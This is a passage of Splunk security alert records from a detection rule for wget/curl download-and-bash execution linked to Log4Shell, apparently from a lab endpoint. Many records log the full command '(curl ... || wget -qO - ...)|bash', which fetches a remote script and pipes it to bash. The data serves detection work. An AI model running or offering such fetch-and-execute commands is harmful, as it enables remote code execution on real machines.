a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638857, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", 